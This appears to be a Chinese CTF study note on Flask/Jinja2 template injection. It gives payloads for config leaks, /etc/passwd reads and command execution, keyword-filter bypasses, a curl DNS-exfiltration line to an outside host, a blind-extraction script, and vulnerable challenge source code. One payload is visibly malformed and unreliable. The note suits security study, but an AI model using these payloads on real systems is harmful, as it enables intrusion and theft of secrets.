前置知识

  • 原理:服务器模板中拼接了恶意用户输入导致各种漏洞

  • flask的渲染方法:

    • render_template():渲染一个指定文件

      1
      return render_template('index.html')
    • render_template_string:渲染一个字符串

      1
      2
      html = '<h1>This is index page</h1>'
      return render_template_string(html)
  • 模板

    • flask使用jinja2作为渲染引擎

      • 在网站的根目录下创建templates文件夹,这里用来存放html文件,也就是模板文件

        • test.py

          1
          2
          3
          4
          from flask import Flask,url_for,redirect,render_template,render_template_string
          @app.route('/index/')
          def user_login():
          return render_template('index.html')
        • /templates/index.html

          1
          <h1>This is index page</h1>
      • 导致漏洞的例子

        • demo.py

          1
          2
          3
          4
          from flask import Flask,url_for,redirect,render_template,render_template_string
          @app.route('/index/')
          def user_login():
          return render_template('index.html',content='This is index page.')
        • /templates/index.html

          1
          <h1>{{content}}</h1>
    • flask的全局变量

      • current_app:代表当前flask程序实例
      • g:作为flask程序全局的临时变量
      • requests:客户端发送的HTTP请求内容
      • session:用户会话
  • python自带的函数

    • config:可以从模板中直接发让问flask当前的config都西昂
    • request:flask中代表当前请求的request对象
    • session:为flask的session对象
    • url_for():该函数会根据传入的路由器函数名,返回该路由对应的url,在模板中始终是有url_for()就可以安全的修改路由绑定url
    • get_flashed_messages():该函数会返回之前在flask中通过flask传入的消息的列表
  • python的魔术方法

    • init:对象初始化方法
    • class:返回对象所属的类
    • module:返回类所在的模块
    • mro:返回类的调用顺序,可以用来寻找父类
    • base:获取类的直接父类
    • dict:用于返回当前类的函数、属性、全局变量等
    • subclasses:返回所有仍处于活动状态的引用的列表,列表按定义顺序排列(用来找子类)
    • globals:获取函数所属空间下可使用的模块,方法以及变量(用来访问全局变量)
    • import:用于导入模块、经常用于导入os模块
    • builtins:返回python中的内置函数
  • ssti的利用思路:

    • 寻找一个倒霉的内置类:[]、””等
    • 通过这个类直接获取到object类:base、mro等
    • 通过object类获取到所有子类:subclasses
    • 在子列表中寻找可以利用的类
    • 直接调用类下面函数或使用该类空间下可用的其他模块的函数

利用

  • 获取配置文件

    1
    2
    3
    # 获取配置信息
    {{config}} # 能获取到config,它包含了如数据库链接字符串、连接到第三方的凭证、SECRET_KEY等敏感信息
    {{request.environ}} # 服务器环境信息
  • xss

    • 存在xss漏洞的代码

      1
      2
      3
      4
      5
      6
      7
      @app.route('/test/')
      def test():
      code = request.args.get('id')
      html = '''
      <h3>%s</h3>
      '''%(code)
      return render_template_string(html)
    • 这段diamond存在漏洞的原因是数据和代码的混淆,代码中的code是用户可控的,会和html进行拼接后直接带入渲染

  • rce

    • warnings.catch_warnings这个类虽然不存在os模块,单是warnings.catch_warnings类在内部定义了_moudle=sys.module[‘warnings’],然后warnings模块包含builtins,也就是说只要能找到warnings.catch_warnings这个类,就可以不用globals

    • _frozen_importlib_external.FileLoader的get_data()方法,第一个是参数0,第二个为要读取的文件名

    • subprocess

      • popen:可以直接命令执行
      • run:3.5中新增的函数。执行指定的之类
      • call:执行指定的之类,返回命令执行状态,类似os.system(cmd)
      • check_call:2.5新增的函数,执行指定的之类,如果执行成功则返回状态码,否则抛出异常
      • check_output:2.7中新增的函数,执行指定的命令,如果执行状态码为0则返回命令执行的结果,否则抛出异常
      • getoutput:接收字符串格式的命令,执行命令并且返回执行结果,功能类似os.popen
    • 直接使用os(os._wrap_close)

    • linecache类所属空间下可用os模块进行rce

    • 利用file类进行文件读取(但是该类在py3被删除了)

      • 读取

        1
        2
        {{[].__class__.__base__.__subclasses__()[40]('etc/passwd').read()}}
        {{[].__class__.__base__.__subclasses__()[40]('etc/passwd').readlines()}}
      • 写入

        1
        {{"".__class__.__bases[0]__.__bases__[0].__subclasses__()[40]('/tmp').write('test')}}

绕过

  • 过滤点

    • 使用[]绕过

      1
      {{()['__class__']['__base__']['__subclasses__']()[433]['__init__']['__globals__']['popen']('whoami')['read']()}}
    • 使用attr绕过

      1
      {{()|attr('__class__')|attr('__base__')|attr('__subclasses__')()|attr('__getitem__')(65)|attr('__init__')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('eval')('__import__("os").popen("whoami").read()')}}
    • 使用getattr绕过

  • 过滤单引号和双引号

    • request绕过
    • chr绕过
  • 过滤小括号

    • 使用python内置函数:

      • get_flashed_messages()

        1
        {{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
      • url_for()

        1
        {{url_for.__globals__['current_app'].config['FLAG']}}
  • 过滤class、subclasses、read关键字

    • 使用request:

      • GET:request.args

      • Cookies:request.cookies

      • Headers:request.headers

      • Environment:request.environ

      • Values:request.values

        1
        {{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__
    • 拼接字符串

      1
      2
      3
      'o'+'s'
      'sy' + 'stem'
      'fl' + 'ag'
    • 编码绕过

    • 大小写绕过

    • 过滤config

      1
      {{self.dict._TemplateReference__context.config}}
  • 过滤下划线_

    • 使用request
    • 使用十六进制绕过
  • 过滤中括号

    • getattribute

      1
      {{"".__getattribute__("__cla"+"ss__").__base__}}
    • getattribute结合request绕过

  • 过滤双大括号

    • dns外带

      1
      {% if ().__class__.__base__.__subclasses__()[433].__init__.__globals__['popen']("curl `whoami`.k1o75b.ceye.io").read()=='kawhi' %}1{% endif %}
    • 盲注(脚本)

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      import requests

      url = 'http://ip:5000/?name='

      def check(payload):
      r = requests.get(url+payload).content
      return 'kawhi' in r

      password = ''
      s = r'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;<=>?@[\\]^`{|}~\'"_%'

      for i in xrange(0,100):
      for c in s:
      payload = '{% if ().__class__.__bases__[0].__subclasses__()[40].__init__.__globals__.__builtins__.open("/etc/passwd").read()['+str(i)+':'+str(i+1)+'] == "'+c+'" %}kawhi{% endif %}'
      if check(payload):
      password += c
      break
      print password
  • 导入主函数读取变量

    1
    {%print request.application.__globals__.__getitem__('__builtins__').__getitem__('__import__')('__main__').flag %}
  • unicode绕过

  • 全角字符绕过

  • 脚本

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    #unicode绕过
    def string_to_unicode(input_string):
    # 将每个字符转换为 Unicode 转义序列
    unicode_string = ''.join(f'\\u{ord(char):04x}' for char in input_string)
    print("Unicode转换的结果是:"+unicode_string)
    #八进制绕过
    def string_to_octal(input_string):
    octal_string = "".join([f"\\{oct(ord(char))[2:]}" for char in input_string])
    print("八进制转换的结果是:"+octal_string)
    #16进制绕过
    def sixteen_to_string(input_string):
    sixteen_string = "".join([f"\\x{hex(ord(char))[2:]}" for char in input_string])
    print("十六进制转换的结果是:"+sixteen_string)
    #chr字符转换
    def string_to_chr(input_string):
    i=input_string
    chr_string = ""
    for c in i:
    c = ord(c)
    b = "chr(%d)" % (c)
    chr_string += b + '%2b'
    print(chr_string[0:-3:1])
    #半角字符转换
    def full_to_half(input_string):
    n = []
    for char in input_string:
    # 全角空格转换为半角空格
    if char == ' ':
    char = ' '
    # 全角字符(除空格)转换为半角字符
    elif 33 <= ord(char) <= 126:
    char = chr(ord(char) + 65248)
    n.append(char)
    print( "半角字符转换的结果是:"+''.join(n))

    # 测试字符串
    input_string = ""

    # 转换为 Unicode 编码
    unicode_encoded = string_to_unicode(input_string)
    octal_encoded = string_to_octal(input_string)
    sixteen_encoded =sixteen_to_string(input_string)
    chr_encoded = string_to_chr(input_string)
    har_encoded = full_to_half(input_string)

例题

0xGame(ez_ssti)-无参

  • 源代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from flask import Flask, request
    import subprocess

    app = Flask(__name__)

    @app.route("/")
    def index():
    return open(__file__).read()

    @app.route("/calc", methods=['POST'])
    def calculator():
    expression = request.form.get('expression') or "114 1000 * 514 + p"
    result = subprocess.run(["dc", "-e", expression], capture_output=True,text=True)
    return result.stdout


    if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)
  • 但是这里发现在url中存在ssti注入漏洞,注入点在404的处理函数,会将请求的url作为模板字符串渲染,而请求路径和参数对我们来说是可控的,并且我们需要获取环境变量里面的flag,这里我们需要利用sys模块,sys.modules中存储了所有模块的信息

  • payload

    1
    2
    {{x.__init__.__globals__['__builtins__'][']('sys')[import]('sys')[']
    ('sys').modules['__main__'].flag}}

极客大挑战(Can_you_Pass_Me)

  • 基础ssti,payload

    1
    {'name': '{%print ((((joiner|attr(\'_\'\'_init__\')|attr(\'_\'\'_globals__\')|attr(\'__g\'\'etitem__\'))(\'_\'\'_builtins__\')).__import__(\'o\'\'s\')|attr(\'p\'\'open\'))("\\x63\\x61\\x74\\x20\\x2f\\x70\\x72\\x6f\\x63\\x2f\\x73\\x65\\x6c\\x66\\x2f\\x65\\x6e\\x76\\x69\\x72\\x6f\\x6e")|attr(\'r\'\'ead\'))()%}'}

长城杯(CandyShop)–原型链污染配合ssti

  • 源代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    import datetime
    from flask import Flask, render_template, render_template_string, request, redirect, url_for, session, make_response
    from wtforms import StringField, PasswordField, SubmitField
    from wtforms.validators import DataRequired, Length
    from flask_wtf import FlaskForm
    import re


    app = Flask(__name__)

    app.config['SECRET_KEY'] = 'xxxxxxx'

    class RegistrationForm(FlaskForm):
    username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
    password = PasswordField('Password', validators=[DataRequired(), Length(min=6, max=20)])
    submit = SubmitField('Register')

    class LoginForm(FlaskForm):
    username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
    password = PasswordField('Password', validators=[DataRequired(), Length(min=6, max=20)])
    submit = SubmitField('Login')

    class Candy:
    def __init__(self, name, image):
    self.name = name
    self.image = image

    class User:
    def __init__(self, username, password):
    self.username = username
    self.password = password

    def verify_password(self, username, password):
    return (self.username==username) & (self.password==password)
    class Admin:
    def __init__(self):
    self.username = ""
    self.identity = ""

    def sanitize_inventory_sold(value):
    return re.sub(r'[a-zA-Z_]', '', str(value))
    def merge(src, dst):
    for k, v in src.items():
    if hasattr(dst, '__getitem__'):
    if dst.get(k) and type(v) == dict:
    merge(v, dst.get(k))
    else:
    dst[k] = v
    elif hasattr(dst, k) and type(v) == dict:
    merge(v, getattr(dst, k))
    else:
    setattr(dst, k, v)

    candies = [Candy(name="Lollipop", image="images/candy1.jpg"),
    Candy(name="Chocolate Bar", image="images/candy2.jpg"),
    Candy(name="Gummy Bears", image="images/candy3.jpg")
    ]
    users = []
    admin_user = []
    @app.route('/register', methods=['GET', 'POST'])
    def register():
    form = RegistrationForm()
    if form.validate_on_submit():
    user = User(username=form.username.data, password=form.password.data)
    users.append(user)
    return redirect(url_for('login'))

    return render_template('register.html', form=form)

    @app.route('/login', methods=['GET', 'POST'])
    def login():
    form = LoginForm()
    if form.validate_on_submit():
    for u in users:
    if u.verify_password(form.username.data, form.password.data):
    session['username'] = form.username.data
    session['identity'] = "guest"
    return redirect(url_for('home'))

    return render_template('login.html', form=form)

    inventory = 500
    sold = 0
    @app.route('/home', methods=['GET', 'POST'])
    def home():
    global inventory, sold
    message = None
    username = session.get('username')
    identity = session.get('identity')

    if not username:
    return redirect(url_for('register'))

    if sold >= 10 and sold < 500:
    sold = 0
    inventory = 500
    message = "But you have bought too many candies!"
    return render_template('home.html', inventory=inventory, sold=sold, message=message, candies=candies)

    if request.method == 'POST':
    action = request.form.get('action')
    if action == "buy_candy":
    if inventory > 0:
    inventory -= 3
    sold += 3
    if inventory == 0:
    message = "All candies are sold out!"
    if sold >= 500:
    with open('secret.txt', 'r') as file:
    message = file.read()

    return render_template('home.html', inventory=inventory, sold=sold, message=message, candies=candies)


    @app.route('/admin', methods=['GET', 'POST'])
    def admin():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
    return redirect(url_for('register'))
    admin = Admin()
    merge(session,admin)
    admin_user.append(admin)
    return render_template('admin.html', view='index')

    @app.route('/admin/view_candies', methods=['GET', 'POST'])
    def view_candies():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
    return redirect(url_for('register'))
    return render_template('admin.html', view='candies', candies=candies)

    @app.route('/admin/add_candy', methods=['GET', 'POST'])
    def add_candy():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
    return redirect(url_for('register'))
    candy_name = request.form.get('name')
    candy_image = request.form.get('image')
    if candy_name and candy_image:
    new_candy = Candy(name=candy_name, image=candy_image)
    candies.append(new_candy)
    return render_template('admin.html', view='add_candy')

    @app.route('/admin/view_inventory', methods=['GET', 'POST'])
    def view_inventory():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
    return redirect(url_for('register'))
    inventory_value = sanitize_inventory_sold(inventory)
    sold_value = sanitize_inventory_sold(sold)
    return render_template_string("商店库存:" + inventory_value + "已售出" + sold_value)

    @app.route('/admin/add_inventory', methods=['GET', 'POST'])
    def add_inventory():
    global inventory
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
    return redirect(url_for('register'))
    if request.form.get('add'):
    num = request.form.get('add')
    inventory += int(num)
    return render_template('admin.html', view='add_inventory')

    @app.route('/')
    def index():
    return render_template('index.html')

    if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=1337)
  • 在admin路由下发现存在原型链污染

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    @app.route('/admin', methods=['GET', 'POST'])
    def admin():
    username = session.get('username')
    identity = session.get('identity')
    if not username or identity != 'admin':
    return redirect(url_for('register'))
    admin = Admin()
    merge(session,admin)
    admin_user.append(admin)
    return render_template('admin.html', view='index')
  • 但是原型链污染只能在admin成功登陆后才能触发,那么首先我们需要对session进行伪造,session伪造首先要获取到密钥,对session进行爆破得到密钥:a123456,接着伪造session后就可以进行原型链污染,但是在源码中存在过滤

    1
    2
    def sanitize_inventory_sold(value):
    return re.sub(r'[a-zA-Z_]', '', str(value))
  • 过滤了字母以及下划线,使用八进制绕过,原始payload,转换成八进制就行

    1
    {{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()')}}

ciscn(proxy)–无回显ssti

  • 源代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    from flask import Flask, request, render_template_string
    import socket
    import threading
    import html

    app = Flask(__name__)

    @app.route('/', methods=["GET"])
    def source():
    with open(__file__, 'r', encoding='utf-8') as f:
    return '<pre>'+html.escape(f.read())+'</pre>'

    @app.route('/', methods=["POST"])
    def template():
    template_code = request.form.get("code")
    # 安全过滤
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
    if black in template_code:
    return "Forbidden content detected!"
    result = render_template_string(template_code)
    print(result)
    return 'ok' if result is not None else 'error'

    class HTTPProxyHandler:
    def __init__(self, target_host, target_port):
    self.target_host = target_host
    self.target_port = target_port

    def handle_request(self, client_socket):
    try:
    request_data = b""
    while True:
    chunk = client_socket.recv(4096)
    request_data += chunk
    if len(chunk) < 4096:
    break

    if not request_data:
    client_socket.close()
    return

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
    proxy_socket.connect((self.target_host, self.target_port))
    proxy_socket.sendall(request_data)

    response_data = b""
    while True:
    chunk = proxy_socket.recv(4096)
    if not chunk:
    break
    response_data += chunk

    header_end = response_data.rfind(b"\r\n\r\n")
    if header_end != -1:
    body = response_data[header_end + 4:]
    else:
    body = response_data

    response_body = body
    response = b"HTTP/1.1 200 OK\r\n" \
    b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \
    b"Content-Type: text/html; charset=utf-8\r\n" \
    b"\r\n" + response_body

    client_socket.sendall(response)
    except Exception as e:
    print(f"Proxy Error: {e}")
    finally:
    client_socket.close()

    def start_proxy_server(host, port, target_host, target_port):
    proxy_handler = HTTPProxyHandler(target_host, target_port)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(100)
    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")

    try:
    while True:
    client_socket, addr = server_socket.accept()
    print(f"Connection from {addr}")
    thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
    thread.daemon = True
    thread.start()
    except KeyboardInterrupt:
    print("Shutting down proxy server...")
    finally:
    server_socket.close()

    def run_flask_app():
    app.run(debug=False, host='127.0.0.1', port=5000)

    if __name__ == "__main__":
    proxy_host = "0.0.0.0"
    proxy_port = 5001
    target_host = "127.0.0.1"
    target_port = 5000

    # 安全反代,防止针对响应头的攻击
    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
    proxy_thread.daemon = True
    proxy_thread.start()

    print("Starting Flask app...")
    run_flask_app()

  • 无回显不出网写入app.py

参考